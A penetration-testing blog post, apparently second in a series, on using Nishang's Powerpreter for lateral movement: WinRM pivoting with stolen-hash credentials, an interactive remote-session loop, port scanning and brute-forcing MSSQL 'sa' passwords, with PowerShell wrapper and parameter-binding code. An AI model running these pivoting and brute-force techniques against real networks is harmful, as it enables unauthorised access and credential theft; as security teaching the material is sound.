



We can use Powerpreter to pivot to and poke other machines in a network. The assumption here is that we have local admin access to one machine in the network, and that the same admin account also has access to other machines in the network (as is common in enterprise environments).



Pivot



Powerpreter contains Pivot functionality. It depends on PowerShell Remoting (WinRM) to function, so the targets must have remoting enabled and reachable (TCP 5985 for HTTP, 5986 for HTTPS). It also means that everything which can be done using Pivot could be done with Invoke-Command directly; in fact, Pivot is just a wrapper around Invoke-Command.



Pivot can be used in both interactive and non-interactive mode. We can supply a username and password, or use the credentials of the current session (for example, a PowerShell process started by WCE with a stolen password hash, whose token then carries the admin's credentials).



Let's see a non-interactive Pivot to a single machine.









We can use it on multiple machines too. Let's see a non-interactive Pivot to multiple machines.







Nice and easy, isn't it?
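To make the "Pivot is just a wrapper around Invoke-Command" point concrete, here is an added example that is not Nishang's Pivot code and not from the original post: a minimal stand-in that opens PSSessions to one or more targets, either with explicit username/password or with the credentials of the current process (the WCE case, where nothing is passed), and runs a payload scriptblock on all of them non-interactively. The function name Invoke-PivotDemo, the hostnames and the credentials are placeholders for the demonstration.

```powershell
# Added example, not Nishang's Pivot: a thin wrapper around New-PSSession/Invoke-Command.
function Invoke-PivotDemo
{
    Param(
        [Parameter(Mandatory = $true, Position = 0)]
        [string[]]$ComputerName,

        [Parameter(Mandatory = $true, Position = 1)]
        [scriptblock]$Payload,

        # Leave both empty to authenticate with the current process token
        # (e.g. a shell launched by WCE with a stolen hash).
        [string]$UserName,
        [string]$Password,

        # Keep the sessions open after the payload runs so they can be reused.
        [switch]$KeepSession
    )

    $sessionArgs = @{ ComputerName = $ComputerName }
    if ($UserName)
    {
        # Explicit credentials: required when the current token cannot be reused on
        # a further hop, which is the normal case when pivoting from inside a remote session.
        $secure = ConvertTo-SecureString -String $Password -AsPlainText -Force
        $sessionArgs.Credential = New-Object System.Management.Automation.PSCredential($UserName, $secure)
    }

    # One PSSession per target. Unreachable hosts (WinRM off, firewall, bad
    # credentials) produce a non-terminating error and are skipped.
    $sessions = New-PSSession @sessionArgs -ErrorAction Continue
    if (-not $sessions) { return }

    # Non-interactive run: the same scriptblock executes on every session in
    # parallel and each result comes back tagged with PSComputerName.
    Invoke-Command -Session $sessions -ScriptBlock $Payload

    if (-not $KeepSession)
    {
        Remove-PSSession -Session $sessions
    }
}

# Single target with explicit credentials (placeholders).
Invoke-PivotDemo -ComputerName 'target1' -UserName 'target1\administrator' -Password 'P@ssw0rd' -Payload { whoami; hostname }

# Several targets using the credentials of the current process; the sessions are
# kept so they can be listed with Get-PSSession and used interactively afterwards.
Invoke-PivotDemo -ComputerName 'target1', 'target2' -KeepSession -Payload { Get-Process | Select-Object -First 3 }
Get-PSSession | Format-Table Id, ComputerName, State
```

Because New-PSSession accepts an array of computer names, the single-machine and multiple-machine cases are the same code path; the only difference is how many sessions Invoke-Command fans out over.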





Non-interactive is good, but nothing beats an interactive session on a machine :) Let's see interactive pivoting on multiple machines from a WCE-generated PowerShell (using password hashes, so no username or password is passed to Pivot).



Nice, we have two sessions with us. We can use the Get-PSSession cmdlet to list the sessions. To interact with a session, use the Use-Session function of powerpreter.





We could use the built-in cmdlet Enter-PSSession to interact with a session, so why does powerpreter have a separate function for the same thing? The reason shows up when one tries to use Enter-PSSession from inside a PowerShell remoting session, that is, on the second hop.





Points to note in the above example:

1. When using Pivot from a remote session, note that we used the username in the form "computer\username". Credentials have to be passed explicitly here: by default the credentials used for the first hop are not delegated to a second machine (the well-known double-hop problem), so the remote session cannot simply reuse them.

2. We got an error while trying to use Enter-PSSession from the remote session; AFAIK starting an interactive session from inside another remote session is not supported.

3. But Use-Session from powerpreter worked!



Why did Use-Session work?



```powershell
function Use-Session
{
<#
.EXAMPLE
PS > Use-Session -id <Id>
Above command uses the credentials available with current powershell session (or other shell) to connect to target. It creates PSSessions. Use Use-Session to interact with the created sessions.

.LINK
http://code.google.com/p/nishang
#>
    Param (
        [Parameter(Position = 0, Mandatory = $True)]
        $id
    )

    # Read-eval loop: every line typed at the prompt is turned into a scriptblock
    # and run in the target session with Invoke-Command -Session, so variables,
    # location and other state on the target persist between commands.
    # Typing "exit" returns to the local prompt without sending "exit" to the target.
    while ($true)
    {
        $sess = Get-PSSession -Id $id
        $computername = $sess.ComputerName
        Write-Host -NoNewline "$computername> "
        $cmd = Read-Host
        if ($cmd -eq "exit") { break }
        $sb = [scriptblock]::Create($cmd)
        Invoke-Command -ScriptBlock $sb -Session $sess
    }
}
```

Invoke-Command is supported from inside a PowerShell remoting session. Use-Session calls it with the -Session parameter, so the same PSSession (and its state) is reused for every command, which is what makes the loop usable as an interactive shell.

Now, let's have a look at a couple more functionalities in powerpreter which can be used to poke other machines in the network.

As the name suggests, the port scan function can be used to port scan other machines on the network. Please note that a parameter has to be passed to specify that we want a port scan; by default only a ping sweep is performed. There is a default port range which is scanned, but a custom port range can also be provided.

Let's look for an MSSQL Server on the network.

Bingo! We found one (already set up ;)).

The brute force function can be used to brute force services like MSSQL, ActiveDirectory, Web or FTP on other machines. The default service is MSSQL. Let's brute force the sa username on the server discovered above.

Yay, we got one password! (This too has been set up already ;))

As you can see, we can use a list of passwords (and also of IPs and usernames) instead of a single value. There is a small catch here: the password list must start with the word "password", like this.

Why? Have a look at the Param block of the brute force function:

```powershell
Param(
    [Parameter(Mandatory = $true, Position = 0, ValueFromPipeLineByPropertyName = $true)]
    [Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")]
    [string]$Identity,

    [parameter(Position = 1, ValueFromPipeLineByPropertyName = $true)]
    [string]$UserName,

    [parameter(Position = 2, ValueFromPipeLineByPropertyName = $true)]
    [string]$Password,

    [parameter(Position = 3)]
    [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
    [string]$Service = "SQL"
)
```

The parameters accept pipeline input by property name only. When the list file is read with Import-Csv, its first line becomes the property name of every object that follows, so a file whose first line is "password" yields objects with a Password property, which binds to -Password; likewise a column headed with any of the aliases (IP, ComputerName, ...) binds to -Identity, and one headed "username" binds to -UserName.

This is the second post in the series about powerpreter. You can read the first part here: http://www.labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
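To show the binding rule behind that catch, here is an added example that is not from the original post or from Nishang: a stand-in function whose parameters carry the same ValueFromPipelineByPropertyName attributes as the brute force Param block, fed with a constructed list file written to the temp directory. The function name Invoke-BindingDemo, the file name, the IP address and the candidate passwords are all placeholders for the demonstration.

```powershell
# Added example (not Nishang's code): same binding attributes as the brute force Param block.
function Invoke-BindingDemo
{
    Param(
        [Parameter(Mandatory = $true, Position = 0, ValueFromPipelineByPropertyName = $true)]
        [Alias("IP","IPAddress","ComputerName")]
        [string]$Identity,

        [Parameter(Position = 1, ValueFromPipelineByPropertyName = $true)]
        [string]$UserName,

        [Parameter(Position = 2, ValueFromPipelineByPropertyName = $true)]
        [string]$Password
    )
    # A Process block runs once per piped object; without it the body would run
    # once at the end with only the last object's values bound.
    Process
    {
        "Identity=$Identity UserName=$UserName Password=$Password"
    }
}

# Constructed sample list. The first line is a header, so Import-Csv turns each
# following line into an object with a single property named "password".
$list = Join-Path $env:TEMP 'passlist.txt'
Set-Content -Path $list -Value @('password', 'Password1', 'Summer2013', 'sa')

# Works: every object's "password" property binds to -Password by name, while the
# mandatory -Identity and -UserName are supplied on the command line (placeholders).
Import-Csv -Path $list | Invoke-BindingDemo -Identity '192.168.1.10' -UserName 'sa'

# Same list without the header: Import-Csv now uses "Password1" as the column name,
# so the first candidate is consumed as a header and the remaining objects carry a
# "Password1" property that matches no parameter, which raises a binding error
# ("The input object cannot be bound to any parameters for the command ...").
Set-Content -Path $list -Value @('Password1', 'Summer2013', 'sa')
Import-Csv -Path $list | Invoke-BindingDemo -Identity '192.168.1.10' -UserName 'sa'

# Plain strings from Get-Content have no properties to bind by name, and none of the
# parameters accept pipeline input by value, so every line raises the same error.
Get-Content -Path $list | Invoke-BindingDemo -Identity '192.168.1.10' -UserName 'sa'

# A multi-column list binds all three by name: "ip" reaches -Identity through its
# alias, "username" reaches -UserName and "password" reaches -Password, so nothing
# needs to be passed on the command line (mandatory -Identity is satisfied per object).
Set-Content -Path $list -Value @('ip,username,password', '192.168.1.10,sa,sa', '192.168.1.11,sa,Password1')
Import-Csv -Path $list | Invoke-BindingDemo

Remove-Item -Path $list
```

Property-name matching is case-insensitive, which is why a lowercase "password" header binds to -Password; the header only has to spell the parameter name or one of its aliases.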